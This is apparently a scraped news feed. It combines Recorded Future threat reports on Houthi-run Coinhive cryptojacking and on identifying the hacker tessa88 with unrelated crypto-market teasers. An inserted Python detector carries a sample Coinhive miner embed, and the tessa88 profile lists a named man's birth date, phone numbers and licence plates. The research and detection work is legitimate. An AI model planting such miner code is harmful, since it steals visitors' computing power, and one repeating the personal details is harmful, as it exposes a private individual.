Of the 974 hosts, all of them are MikroTik routers under the same ISP, and a majority of them (379) are located in Sana’a, the Houthi-held capital. Additionally, “unique” site keys generated by Coinhive admin accounts have been reused for multiple hosts, suggesting that a few accounts control a large majority of these hosts. Because of current Houthi government control over the ASN and .ye domain space, the relatively new coin mining technology, and the utilization of a few Coinhive accounts on multiple hosts, Recorded Future assesses with medium confidence that the Houthi-led government is attempting to use Coinhive to generate alt-currency for the regime. Additional sources of revenue during a time of famine and economic crisis would bolster Houthi-led efforts to legitimize themselves domestically by providing aid to Houthi regions where famine is harshest and purchasing additional conventional weapons to use against the Hadi-led government. Recorded Future was unable to determine how much Monero has been generated from these efforts.
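The site-key reuse reasoning above (a few Coinhive accounts controlling many hosts) can be checked directly by extracting the site key from each host's served page and grouping hosts by key. This is an added example, not Recorded Future's analysis code; the HTML bodies and site keys are constructed, and the script pattern matched follows Coinhive's standard embed (coinhive.min.js plus a CoinHive.Anonymous('<site key>') call).

```python
"""Extract Coinhive site keys from served HTML and measure key reuse across
hosts, the signal used to infer that few accounts control many miners.

Added example; not Recorded Future's tooling. Pages and keys below are
constructed, not captured from real hosts.
"""
import re
from collections import defaultdict

# Coinhive's embed loads the miner library and then instantiates
# CoinHive.Anonymous('<site key>') (or CoinHive.User('<site key>', ...)).
LOADER_RE = re.compile(r"coinhive\.min\.js", re.IGNORECASE)
SITEKEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9+/=_-]{16,64})['\"]"
)

# Constructed sample: host -> HTML body. Four hosts share key A, one uses
# key B, one is clean, one loads the library without starting a miner.
KEY_A = "CONSTRUCTEDKEY0000000000000000AA"
KEY_B = "CONSTRUCTEDKEY1111111111111111BB"
MINER_PAGE = (
    '<html><body><h1>Error</h1>'
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    "<script>var miner = new CoinHive.Anonymous('{key}');"
    "miner.start();</script></body></html>"
)
SAMPLE_PAGES = {
    "192.0.2.1": MINER_PAGE.format(key=KEY_A),
    "192.0.2.2": MINER_PAGE.format(key=KEY_A),
    "192.0.2.3": MINER_PAGE.format(key=KEY_A),
    "192.0.2.4": MINER_PAGE.format(key=KEY_A),
    "192.0.2.5": MINER_PAGE.format(key=KEY_B),
    "192.0.2.6": "<html><body>Router login</body></html>",
    "192.0.2.7": '<script src="https://coinhive.com/lib/coinhive.min.js"></script>',
}


def extract_site_keys(body):
    """Return the set of site keys in a page, or an empty set when the page
    does not load the miner library (a bare key string is not enough)."""
    if not LOADER_RE.search(body):
        return set()
    return set(SITEKEY_RE.findall(body))


def group_hosts_by_key(host_bodies):
    """Map each site key to the sorted list of hosts that embed it."""
    by_key = defaultdict(set)
    for host, body in host_bodies.items():
        for key in extract_site_keys(body):
            by_key[key].add(host)
    return {key: sorted(hosts) for key, hosts in by_key.items()}


def reuse_report(host_bodies):
    """Summarize concentration: how many hosts mine, how many distinct keys
    they use, and how many hosts the single most-reused key covers."""
    groups = group_hosts_by_key(host_bodies)
    mining_hosts = {h for hosts in groups.values() for h in hosts}
    top_key, top_hosts = max(groups.items(), key=lambda kv: len(kv[1]),
                             default=(None, []))
    return {
        "mining_hosts": len(mining_hosts),
        "distinct_keys": len(groups),
        "top_key": top_key,
        "top_key_hosts": len(top_hosts),
    }


if __name__ == "__main__":
    for key, hosts in group_hosts_by_key(SAMPLE_PAGES).items():
        print(f"{key}: {len(hosts)} hosts -> {', '.join(hosts)}")
    print(reuse_report(SAMPLE_PAGES))
```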

Expected Cyber Targeting Profiles

Recorded Future expected certain targeting profiles for each of the major belligerents in the Yemen conflict. This section will explore that expected activity, along with any differences or lack of data affecting those parties.

Houthi Supreme Political Council

The fact that the Houthis control a vast amount of internet resources in Yemen, are supported by Iran, and exert de facto control over the country continues to antagonize the Saudi Arabian government. This likely makes them the target of Saudi Arabian surveillance. Recorded Future expects this surveillance would be primarily used to identify Houthi intent and battle plans for skirmishes across Yemen, and would target routers, traditional hosts, and Android mobile devices. The Citizen Lab has tied Saudi Arabia to the use of NSO Group’s Pegasus espionage tools against iOS devices, showing the Kingdom’s intent to outsource the development of its malware.

Lookout found that the NSO Group’s spyware for Android devices, Chrysaor, uses Message Queue Telemetry Transport (MQTT) for communications. The protocol uses TCP/IP port 1883 and port 8883 when traffic is encrypted over SSL. This protocol is also used by the common MeetMe social media platform and is commonly used for connections in remote locations that do not always have uptime. Despite Houthi control of YemenNet, Recorded Future could not identify any infections using the conventional Chrysaor configuration in YemenNet or in any of its collections.

Hadi Government

The Hadi government is directly supported by Saudi Arabia, which is attempting to bolster Sunni and Saudi influence in its neighboring country, and is a direct combatant against the Iranian-backed Houthi forces. Recorded Future would anticipate, due to the Hadi government’s cooperation with China, that there would be some Chinese monitoring of Yemeni activity, even if only as a way of monitoring their investment. Additionally, Recorded Future would expect Iranian mobile surveillance malware to be deployed against these forces, of the kind CheckPoint found to be used against Iranian dissident civilians and potential Islamic State sympathizers.

Southern Secessionists

The Southern Movement, formally known as the Southern Transitional Council (STC), is largely backed by the United Arab Emirates, but has found itself in an uneasy alignment with the Saudi coalition, which has often been tested and broken. In October 2018, the STC forces called for an uprising in Aden, directly conflicting with the Hadi government’s control of the city. The activity provoked further UN calls for peace, allowing the group to gain more international recognition for their goal of an autonomous South Yemen. Due to the UAE and Saudi governments’ cooperation and general alliance, Recorded Future does not anticipate Saudi targeting of the STC forces. Similarly, although the STC is in direct conflict with the Houthis, due to their lack of continued internet holdings or defined cell ranges, Recorded Future does not anticipate any particular targeting by Iranian malware against the STC.

Al-Qaeda in the Arabian Peninsula

Al-Qaeda’s affiliate in Yemen is in a peculiar targeting scenario. The group largely has the backing of the Saudi-led coalition, according to the Carnegie Endowment, sharing a common goal of fighting the Houthis. The Saudis even signed a nonaggression pact with the extremists. This conflicts with the U.S. backing of Saudi Arabian interests, as the United States is targeting AQAP forces almost exclusively in Yemen. The Iranians likely oppose the targeting of Houthi forces by the Saudi-aligned extremists.

Kaspersky found the Slingshot framework targeting individual routers in Yemen and other nations from 2012 to 2018. Slingshot was said to be used by the United States military to target Islamic State and Al-Qaeda members, perhaps in the most publicized instance of cyber being used for terrorist monitoring. Recorded Future could not identify any of this activity.

Outlook

Despite the continued airstrike activity, armed skirmishes among Yemeni factions, and general degradation of Yemen’s infrastructure and public health, internet access in Yemen may prove to be resilient. The introduction of AdenNet to create a dual backbone in Yemen has created an additional network access point to thousands of citizens who had their internet access revoked when the Houthis seized Sana’a. However, vulnerabilities within YemenNet may lead to espionage or even destructive campaigns within its infrastructure, damaging internet access within Houthi-controlled territory.

Recorded Future assesses with medium confidence that, as inflation grows more rampant within the country, the Houthi government in Sana’a will continue its attempt to generate alternate forms of currency to bolster its aid and military efforts. Malware within the country will continue to be a constant factor, especially with new forms of access to the internet. Similarly, some Yemeni citizens will likely continue to circumvent government internet controls, understanding both governments’ past desire to control internet access. Unfortunately, access to information or cyber means will likely not help bring Yemen back from the brink of famine, a cholera outbreak, or the atrocities of continued civil war.

The post Underlying Dimensions of Yemen’s Civil War: Control of the Internet appeared first on Recorded Future.


Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt

The cryptocurrency segment is having its most bullish day in a long while, as despite the failed rally attempt on Monday, the top coins held up above their lows and launched another bounce. While that didn’t change the overwhelmingly bearish overall picture, it confirmed the weakening of the negative momentum, at least in the case […]

The post Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Dollar Ticks Higher as Trade Worries Intensify

Tuesday Market Snapshot Asset Current Value Daily Change S&P 500 2,677 0.60% DAX 30 11,309 -0.40% WTI Crude Oil 51.39 -0.41% GOLD 1,212 -0.79% Bitcoin 3,717 -0.27% EUR/USD 1.1296 -0.28% Risk assets had a mixed day following yesterday’s rally attempt, as Asian and European markets struggled to extend yesterday’s move, with pronounced weakness in China, […]

The post Forex Analysis And Chartbook: Dollar Ticks Higher as Trade Worries Intensify appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD’s Punishing Pennant Set-up

  Bears will be looking to pile on the pressure below the $0.3500 area. The 4-hour chart view can see XRP/USD having formed another pennant pattern, subject to a potential break lower. XRP/USD over the last two sessions has stabilized somewhat but continues to nurse losses. The bulls sent out false hope on Sunday, after […]

The post XRP Price Analysis: XRP/USD’s Punishing Pennant Set-up appeared first on Hacked: Hacking Finance.

DHI: Let Us Trust the Technical Analysis

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets With the market being a bit overheated, it needs a good correction, after which prices will become attractive for investors, who are taking profits on good company reports. The news overall is still positive, and in this situation, only inexperienced traders are ready to buy securities at maximum […]

The post DHI: Let Us Trust the Technical Analysis appeared first on Hacked: Hacking Finance.

Crypto Update: Bounce Fails Again as Bearish Forces Remain Dominant

While yesterday there was a chance for a short-term reversal in the cryptocurrency segment, due to the weakening bearish momentum and an encouraging bounce in some of the majors, the rally failed, and a lot of top coins hit new lows afterward. Our trend model remains on sell signals in most cases, and although the […]

The post Crypto Update: Bounce Fails Again as Bearish Forces Remain Dominant appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD a Buy Today, Tomorrow a Sell?

  The Litecoin price on Tuesday attempts at stabilization, but given the recent pattern, this could be sold again on Wednesday. LTC/USD weekly chart still looks worrying, and there could even be room for a complete market correction, sending the price as low as $4. The Litecoin price has been heavily dictated by the bears […]

The post Litecoin Price Analysis: LTC/USD a Buy Today, Tomorrow a Sell? appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Stocks Attempt Rally as Italian Worries Ease

Monday Market Snapshot Asset Current Value Daily Change S&P 500 2,672 1.15% DAX 30 11,354 1.45% WTI Crude Oil 51.68 2.56% GOLD 1,222 -0.07% Bitcoin 3,723 -5.52% EUR/USD 1.1339 0.03% Risk assets staged a relief rally today before the US open, as Europe provided some minor positive catalysts, which, together with the good early Black […]

The post Forex Analysis And Chartbook: Stocks Attempt Rally as Italian Worries Ease appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD is Forming a Bottom Area, Readying a Recovery

  TRX/USD buyers are heavily defending the 1 cent price territory, as a bottom area gradually forms. Tron foundation continues to provide positive updates and Justin Sun once again takes aim at Ethereum. While selling pressure for TRX/USD is still somewhat intense, there are signs that a bottom area is forming. Buyers are doing their […]

The post Tron Price Analysis: TRX/USD is Forming a Bottom Area, Readying a Recovery appeared first on Hacked: Hacking Finance.

Rebound In Crude Prices May Reveal New Sales

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets Last Friday, crude oil tested this year’s lows. On Monday, November 26th, there is a technical rebound underway in the commodity market, but it barely changes the global picture in terms of oil trading. Right now, the bears are obviously much stronger than the bulls. The second sale […]

The post Rebound In Crude Prices May Reveal New Sales appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed

The cryptocurrency segment is finally showing early signs of strength following the weekend’s selloff that took most of the majors to new bear market lows. Compared to the steep declines of the past couple of weeks, the bearish momentum has been relatively weak, and some of the top coins managed to climb back to, or […]

The post Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed appeared first on Hacked: Hacking Finance.

Crypto Update: Another Steep Selloff Drags Majors to New Lows

The cryptocurrency segment got hit hard yet again this weekend, as the mid-week bounce faded and the recent panic lows failed to hold up the top coins. The negative long-term market forces took hold of the segment again, and despite the deeply oversold momentum readings, the majors plunged to new lows. Bitcoin briefly violated the […]

The post Crypto Update: Another Steep Selloff Drags Majors to New Lows appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Set for $100 Breach, What Next?

ETH/USD has dropped a chunky 55 percent since the 7th November. Bears continue to smash through key area of support. A daily closure below $109.80 (27th May 2017 low) could be devastating, in opening the door for a firm breach of the psychological $100 mark. Selling Pressure in the Highest Gear ETH/USD selling pressure intensity […]

The post Ethereum Price Analysis: ETH/USD Set for $100 Breach, What Next? appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD is One More Breach Away from $0.25

  XRP/USD remains very much vulnerable to another fall. Key levels to note: $0.4000, $0.3800 and then $0.3000-$0.2500. Price action has formed a consolidation block, which is subject to a breakout lower. Recent Price Developments XRP/USD remains firmly in the control of the market bears. The price running within its third consecutive daily session in […]

The post XRP Price Analysis: XRP/USD is One More Breach Away from $0.25 appeared first on Hacked: Hacking Finance.

Forex Analysis and Chartbook: Risk Assets Remain Under Pressure on Black Friday

Friday Market Snapshot Asset Current Value Daily Change S&P 500 2,645 0.47% DAX 30 11,192 0.49% WTI Crude Oil 51.18 -4.98% GOLD 1,223 -0.33% Bitcoin 4,246 -0.67% EUR/USD 1.1335 -0.57% While global stock markets are relatively stable today, the key indices are trading near their recent lows, with the broad risk-off shift still being clearly […]

The post Forex Analysis and Chartbook: Risk Assets Remain Under Pressure on Black Friday appeared first on Hacked: Hacking Finance.

Tron Price Analysis: If the Bulls Do Not Wake Up, Another 35% Drop May be Seen for TRX/USD

TRX/USD is subject to another deep fall given the current technical structure. News flow around Tron remains encouraging, following support from another exchange, Huobi. Social media space continues to get excited about Kobe Bryant being a key speaker at the Tron summit in 2019. TRX/USD over the past few weeks has been a victim of […]

The post Tron Price Analysis: If the Bulls Do Not Wake Up, Another 35% Drop May be Seen for TRX/USD appeared first on Hacked: Hacking Finance.

EOS Update: Bull and Bear Scenarios

EOS (EOS/BTC) recorded one of its major lows of 0.0006914 on August 14, 2018. Since then, the market has been trading within a wide range between 0.0006914 and 0.0009544 with a midpoint or range equilibrium at 0.0008058. Retail investors buying this range are most likely accumulating. They believe that this is the bottom and EOS […]

The post EOS Update: Bull and Bear Scenarios appeared first on Hacked: Hacking Finance.

Crypto Update: Majors Test Lows After Consolidation

After a brief quiet period in the cryptocurrency segment, the top coins turned lower again in the second half of the day and approached their recent bear market lows. While Bitcoin only tested its panic low, Ethereum dipped below at and the still relatively strong Ripple also fell below the key long-term support zone that […]

The post Crypto Update: Majors Test Lows After Consolidation appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Consolidate on Thanksgiving Day After Wild Ride

Volatility declined substantially today in the cryptocurrency segment following three days of heavy trading, with the top coins consolidating after the recent leg of the market-wide crash. US markets have been closed for Thanksgiving Day, and although traditional financial markets had an active day, especially in Europe, volumes in the crypto-segment were much lower than in […]

The post Crypto Update: Coins Consolidate on Thanksgiving Day After Wild Ride appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA/USDT Vulnerable to Another Hard Fall

Cardano’s Charles Hoskinson provided some insight on timing for the 1.4 update and more. ADA/USDT, given market conditions and technical price structure, is subject to another break lower. Cardano’s ADA is in just as much trouble as every other cryptocurrency, given the strong and very stubborn bear market. There still appears to be room for […]

The post Cardano Price Analysis: ADA/USDT Vulnerable to Another Hard Fall appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Calm Before Another Potential Storm

ETH/USD price action is moving within consolidation mode, after being allowed some consolidation gains during the previous session. Major weekly support levels to note are seen at $130 (July 2017) and then $110 (May 2017). ETH/USD was provided a consolidation bounce during yesterday’s session. The price managed to close marginally in the green, after […]

The post Ethereum Price Analysis: Calm Before Another Potential Storm appeared first on Hacked: Hacking Finance.

Crypto Update: Ripple Due for a Correction

While Bitcoin (BTC/USD) and most altcoins have fallen at the height of the crypto carnage, Ripple (XRP/BTC) not only stood its ground but even went against the trend. It managed to continue climbing while almost everything else was crumbling. Yesterday, November 20, 2018, Ripple/Bitcoin was up by as much as 7.17% to as high […]

The post Crypto Update: Ripple Due for a Correction appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Fed-Optimism Sparks Bounce in Risk Assets as Dollar Falls

Wednesday Market Snapshot

Asset | Current Value | Daily Change
S&P 500 | 2,656 | 0.73%
DAX 30 | 11,222 | 1.39%
WTI Crude Oil | 54.72 | 2.49%
GOLD | 1,227 | 0.42%
Bitcoin | 4,456 | 2.39%
EUR/USD | 1.1402 | 0.29%

Yesterday, risk assets had an ugly Wall Street session, with a lot of stocks hitting new multi-month or even multi-year lows, as bulls were running […]

The post Pre-Market Analysis And Chartbook: Fed-Optimism Sparks Bounce in Risk Assets as Dollar Falls appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Flood Gates Open After Breakout and Retest from Pennant

ZEC/USD is licking its wounds with deep double-digit losses as the market continues to take a beating. The next major areas of support are eyed at current levels around $89.50 and then $75. Zcash has been under chunky selling pressure, no thanks to the larger weakness seen across the broader crypto market. The ZEC/USD exchange rate is […]

The post Zcash Price Analysis: ZEC/USD Flood Gates Open After Breakout and Retest from Pennant appeared first on Hacked: Hacking Finance.

Bank Sector Likely to Show Steadiness as 2020 Presidential Election Cycle Looms

About a month ago, we analyzed the financial sector where individual banks were considered for investment. This time, we are back to this sector again, since in the current conditions it cannot be ignored. This time, however, we are going to analyze ETFs that include financial sector papers. When analyzing the S&P 500, there are […]

The post Bank Sector Likely to Show Steadiness as 2020 Presidential Election Cycle Looms appeared first on Hacked: Hacking Finance.

True Identity of Notorious Hacker tessa88 Revealed

Insikt Group

Scope Note: To create the following actor profile, Insikt Group used OSINT, Recorded Future data, and dark web analysis to identify the contact information, alternative aliases, and TTPs used by the actor tessa88.

This profile will be of most interest to email service providers, social media, and technological companies located primarily in the United States and Russia.

Executive Summary

In early 2016, a previously unknown hacker operating under the alias of tessa88 publicly emerged after offering an extensive list of compromised, high-profile databases for sale. The hacker offered for sale the databases of companies such as VKontakte, Mobango, Myspace, Badoo, QIP, Dropbox, Rambler, LinkedIn, and Twitter, among others. Within several months of incredibly active public engagement, the hacker’s personas were banned from almost every dark web community for various reasons, and by May of 2016, tessa88 entirely ceased all communications with the media and public alike. In the following months, numerous attempts were made to uncover the true identity of the hacker. However, no concrete evidence was ever produced that linked tessa88 with any real individual.

New findings strongly suggest that the individual behind tessa88 may be Maksim Donakov of Penza, Russia, who operated under multiple different monikers on the dark web. It is possible that a second unknown individual was assisting Donakov in maintaining the tessa88 account, adhering to impeccable OPSEC procedures and until this day remaining anonymous. In either scenario, we firmly believe that Donakov Maksim has directly benefited from the sales of compromised databases and should be viewed as the main actor.

Key Judgments

  • tessa88’s criminal career likely began as early as 2012, before the breaches of LinkedIn, Dropbox, Yahoo, and others that were attributed to them. They likely created the alias tessa88 specifically to sell high-profile databases.
  • Our analysis, based on discovered images of the real individual hiding behind the moniker tessa88 and underground forum discussions, allows us to assess with a high degree of confidence that tessa88 is a man and not a woman.
  • Our analysis reveals that the moniker tessa88 is tied to aliases Paranoy777, Daykalif, and tarakan72511. All share similar social media photos that are nearly identical to a passport photo of Maksim Donakov, who is the individual behind Paranoy777.
  • Our research suggests that Donakov, Maksim Vladimirovich (Донаков, Максим Владимирович), is a resident of the Russian Federation.

Tessa88 True Identity

Uncovering tessa88’s true identity.

Background

The threat actor tessa88, also known as stervasgoa and jannet93, is a famous hacker who was involved in the sale of multiple high-profile databases, including LinkedIn, VKontakte, Facebook, MySpace, and Twitter, from February to May of 2016. It is believed by some in the media that the actor is a Russian-speaking female. tessa88 was active for only a short time, during which they sold databases from websites including LinkedIn, VKontakte, Yahoo, Yandex, Rambler, MySpace, Badoo, QIP, and Mobango. tessa88 was eventually banned on multiple forums due to accusations of fraudulent activities from other members.

Recorded Future data shows that the actor Peace_of_Mind, also known as Peace, was selling a LinkedIn database as early as May 16, 2016 on the currently defunct TheRealDeal Market. The LinkedIn breach resulted in the arrest of Russian national Yevgeniy Nikulin (Евгений Никулин) by the FBI in October 2016. Nikulin was in the Czech Republic at the time and was later extradited to the United States. The Russian government claimed that the actions of the U.S. were politically motivated, and in an effort to fight Nikulin’s extradition, issued a warrant for his arrest in November 2016, alleging the individual had stolen $3,450 in WebMoney. At the time of this report, the investigation is still pending, and no clear evidence has been produced linking Nikulin to Peace_of_Mind.

Motherboard published their findings from an interview they had with tessa88, who claimed to be a veteran member of the criminal underground and accused Peace_of_Mind of stealing the databases that tessa88 was selling. Peace_of_Mind, in return, claimed that tessa88 stole the databases from a friend to sell online.

A report from the cybersecurity firm InfoArmor claims that tessa88 acted as a proxy who sold accounts and personally identifiable information (PII) stolen by a group of hackers identified as “Group E.” InfoArmor claims that tessa88 was the first to sell accounts from many of these high-profile databases beginning as far back as February 2016, which Recorded Future data confirmed.1 Around May 2016, InfoArmor claimed that tessa88 and Peace_of_Mind made an agreement to share at least some of their respective databases between one another in a likely attempt to expedite monetizing the massive amount of data between the two actors. The relationship between tessa88 and Peace_of_Mind deteriorated as other members of the underground communities claimed the data was of poor quality. If this report is accurate, this corroborates Motherboard’s findings and explains the outspoken hostility between the two actors.

Recorded Future Timeline

Activity of tessa88 (also known as stervasgoa) on the dark web between February and May 2016.

Threat Analysis

An analysis of dark web activity connected tessa88 to multiple chat and email accounts, including the Jabber accounts tessa88@exploit[.]im, tessa88@xmpp[.]jp, mrfreeman777@xmpp[.]jp, darksideglobal@exploit[.]im, the ICQ account 740455, and the email address firetessa@yahoo[.]com.

Tessa88 Selling Databases

tessa88 selling databases from websites including LinkedIn and MySpace on an underground forum that is currently defunct.

The tessa88@exploit[.]im Jabber account used by tessa88 in sales threads on underground forums led to the Twitter account @firetessa, which on July 5, 2016, tweeted out that the Jabber account tessa88@exploit[.]im was theirs.

Twitter Claim

The tweet from the Twitter account @firetessa claiming tessa88@exploit[.]im to be theirs.

The actor TraX, a member of the underground community, stated that tessa88 is a man and posted an alleged photo of the actor on an underground forum. TraX also stated that tessa88 was behind recent mega breaches like LinkedIn, MySpace, and Yahoo, and even expressed a willingness to share this information with reporters.

Tessa88 Alleged Photo

An alleged photo of tessa88 posted by TraX on an underground forum.

OSINT then identified the Imgur account tarakan72511, who posted screenshots of discussions regarding the Yahoo and Equifax breaches with the actors HelloWorld and Ibm33a14. Note that Ibm33a14 is a Russian-speaking actor who claimed to have the original Yahoo and Equifax database dumps in 2017 on several cybercriminal forums.

Discussion Screenshot

A screenshot of a discussion regarding the Yahoo and Equifax posted by tarakan72511.

That same Imgur account also posted a picture titled “tessa88” in 2017, showing a man whose body type and hairstyle are similar to the individual depicted in the aforementioned picture posted by TraX.

Tessa88 Potential Picture

A potential picture of tessa88 posted by tarakan72511 on Imgur.

The moniker tarakan72511 is an alias used by the actor Paranoy777, who uses the Jabber account tarakan72511@chatme[.]im. Paranoy777, like tessa88, was a seller of stolen databases from large social media and technology companies from February to May 2016.

Recorded Future identified a complaint filed against tarakan72511 in which another member claimed that Daykalif is a Russian-speaking scammer who was trading large databases and used the Jabber accounts daykalif@xmpp[.]jp and tarakan72511@chatme[.]im — the same Jabber account used by the actor Paranoy777, who, in turn, is connected to tarakan72511. If this claim is true, then it is likely that the users Paranoy777 and Daykalif are the same person.

Criminal Forum Complaint

A complaint found on a criminal forum claiming that Daykalif used the Jabber accounts daykalif@xmpp[.]jp and tarakan72511@chatme[.]im.

More information provided by the Imgur account tarakan72511 revealed that the user is apparently an avid dog lover. OSINT identified a YouTube account with a similar username — Tarakan72511 Donakov — who posted a video showing someone feeding stray dogs. During the video, a voice was heard stating that they are in Penza, Russia. The vehicle in the video is a Mitsubishi Lancer with the registration number K652BO 58.

YouTube Profile

Tarakan72511 Donakov’s YouTube profile.

Moreover, at 56 seconds in the video, a Guy Fawkes mask is seen. A similar mask was used as the avatar on Tarakan72511 Donakov’s YouTube profile and is also worn by the person on the image shared by TraX.

Guy Fawkes Mask

The Guy Fawkes mask seen in the YouTube video, YouTube avatar, and in TraX’s image.

OSINT gathered on Donakov (Донаков) from Penza (Пенза) revealed that someone named Донаков М.В./Donakov M.V. committed several crimes in the Russian cities of Yaroslavl and Penza, including a motor vehicle accident that happened while driving a Mitsubishi Lancer in 2017. An individual named Donakov, Maksim Vladimirovich (Донаков, Максим Владимирович), originally from Yaroslavl and later having moved to Penza, was also mentioned in multiple articles from SudAct, stating that the individual had spent several years in prison prior to the accident.2

Pivoting from these records, the research identified three Odnoklassniki profiles, all with the name Maxim Donakov — two of which listed their current location as Yaroslavl, and one as Penza. The first Odnoklassniki profile belongs to a man who was residing in Yaroslavl and was born on July 2, 1989. The user last visited the site on September 9, 2013. The second Odnoklassniki profile has the same name and date of birth as the previous profile. Both the profile picture and other images depict the same individual seen in the Imgur image from tarakan72511. Note the Mitsubishi Lancer with the license plate А 134МК 76.

Odnoklassniki Profile

Images from the Odnoklassniki profile of Maxim Donakov.

The analysis of the second Odnoklassniki profile revealed that the actor is linked to another user, “Ядовитый Таракан” (Yadovitiy Tarakan), allegedly residing in Pervomaysk, Ukraine. Yadovitiy Tarakan’s name is synonymous with the Imgur account tarakan72511, and the profile photo of the person strongly resembles Donakov Maxim. It is worth mentioning that Pervomaysk is Maxim Donakov’s real place of birth. Considering the facts mentioned above, we assess with a high degree of confidence that Yadovitiy Tarakan’s profile also belongs to Donakov Maxim.

Odnoklassniki Profile

Another Odnoklassniki profile with the username “Ядовитый Таракан” created by Maxim Donakov.

Furthermore, confidential sources confirmed that Maxim (Maksim) Donakov is a real person born on July 2, 1989. According to SudAct, Donakov was released under police supervision but was then imprisoned after committing another crime in 2014. This may explain the existence of multiple Odnoklassniki profiles, as Donakov may have been forced to create a new profile after his release from prison if he forgot the login credentials for his previous account(s).

OSINT identified other accounts and contact information likely related to Donakov (tessa88), such as a VKontakte profile for Maxim Ivanov with the phone number +79022222229, profiles on Vkrugudruzei and Valet.ru, and the YouTube account Maxim Donakov with the phone number +17789981919. An open web search for “Максим Донаков” revealed the profile Gulik01 on Freelance.ru, which possibly belongs to tessa88 (Donakov). The account information for Gulik01 states that he is a Russian-speaking information technology freelancer.

Moreover, additional searches in leaked databases identified Maksim Donakov, a resident of Penza born on July 2, 1989, matching the user profile information from the aforementioned Odnoklassniki profiles and the image titled “tessa88” posted by the Imgur user tarakan72511, which depicts the same person. Again, all of this indicates that tessa88 is indeed Maksim Donakov.

Bitcoin Wallet Analysis

The analysis of tessa88’s confirmed Bitcoin wallet, with the majority of funds being laundered through LocalBitcoins.

Insikt Group’s analysis of transactions associated with the confirmed tessa88 Bitcoin wallet using Crystal Blockchain revealed that the hacker received at least 168 Bitcoins, or approximately $90,000, and most of the funds were eventually laundered through LocalBitcoins, a popular peer-to-peer exchange service. Despite the actor’s disappearance in May of 2016, he continued using his Bitcoin wallet until August 2017.

Outlook

Insikt Group assesses with a high degree of confidence that tessa88 is one of many monikers created by Maksim Donakov to sell high-profile databases on underground criminal forums. Furthermore, it is likely that Donakov was active on the dark web since at least 2012 and also used the monikers Paranoy777, Daykalif, and tarakan72511.

Maxim Donakov

Maxim Donakov, also known as tessa88, Paranoy777, and Daykalif.

Maksim Donakov, whose full name is Maksim Vladimirovich Donakov (Максим Владимирович Донаков), was born on July 2, 1989. Donakov is a resident of the Russian Federation who previously lived in Yaroslavl and later moved to Penza. Analysis of social media accounts and other sources from Recorded Future further confirms our findings.

According to the conducted analysis, the monikers tessa88, Paranoy777, and Daykalif were created intentionally to sell compromised data on the dark web. Considering the contradictory information regarding the breaches of the aforementioned companies, it is difficult to identify real tactics, techniques, and procedures (TTPs) applied by the hackers. However, the pending investigation of Yevgeniy Nikulin’s case, tied with the LinkedIn data leak, may shed light on this story and fill the remaining gaps.

1Recorded Future observed tessa88 selling PII from high-profile databases on a Russian hacking forum as early as February 2, 2016.

2SudAct (sudact.ru) is the largest non-governmental Russian website of judicial records.

The post True Identity of Notorious Hacker tessa88 Revealed appeared first on Recorded Future.


Pre-Market Analysis And Chartbook: Risk-Off Trade Still On as Stocks Plunge Globally

Tuesday Market Snapshot

Asset | Current Value | Daily Change
S&P 500 | 2,640 | -2.17%
DAX 30 | 11,054 | -1.68%
WTI Crude Oil | 54.04 | -4.81%
GOLD | 1,223 | -0.15%
Bitcoin | 4,604 | -2.75%
EUR/USD | 1.1392 | -0.52%

The broad risk-off shift that we have been following in recent months continues to be the dominant force in global financial markets, and today, global […]

The post Pre-Market Analysis And Chartbook: Risk-Off Trade Still On as Stocks Plunge Globally appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: BCH/USD Hard Flops as Price Moves Within the Abyss

Bitcoin Cash price falls into uncharted territory, struggling to find a bottom. Weekly chart still points to further downside, RSI not within oversold territory as of yet. The Bitcoin Cash price remains heavily on the back foot, the standout under-performer across the major altcoins. BCH/USD is currently running at three consecutive sessions of losses. […]

The post Bitcoin Cash Price Analysis: BCH/USD Hard Flops as Price Moves Within the Abyss appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low

Monday Market Snapshot

Asset | Current Value | Daily Change
S&P 500 | 2,697 | -1.62%
DAX 30 | 11,244 | -0.85%
WTI Crude Oil | 56.76 | -0.12%
GOLD | 1,224 | 0.21%
Bitcoin | 4,989 | -10.26%
EUR/USD | 1.1452 | 0.32%

While all eyes were on the cryptocurrency segment today, as the major coins continue to fall sharply, traditional financial markets have also been very active […]

The post Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: One Last Safety Net Ahead of $20 Territory

Litecoin has been further slammed, dropping 35% over the past two weeks of trading. Should the near-term demand area of $35-33 fail to hold, it will be very punishing. The Litecoin price remains firmly on the back foot, one of the standout under-performers in this current bear market, against some of the other major altcoins. […]

The post Litecoin Price Analysis: One Last Safety Net Ahead of $20 Territory appeared first on Hacked: Hacking Finance.

Crypto Update: New Bear Market Lows Across the Board

The key long-term breakdown in the cryptocurrency segment that we observed last week continued in earnest today, with most of the majors hitting new bear market lows amid another wave of heavy selling. Bitcoin dropped below $5200 for the first time since last October, Ethereum violated the key $160 level, Litecoin plunged below $38, with […]

The post Crypto Update: New Bear Market Lows Across the Board appeared first on Hacked: Hacking Finance.

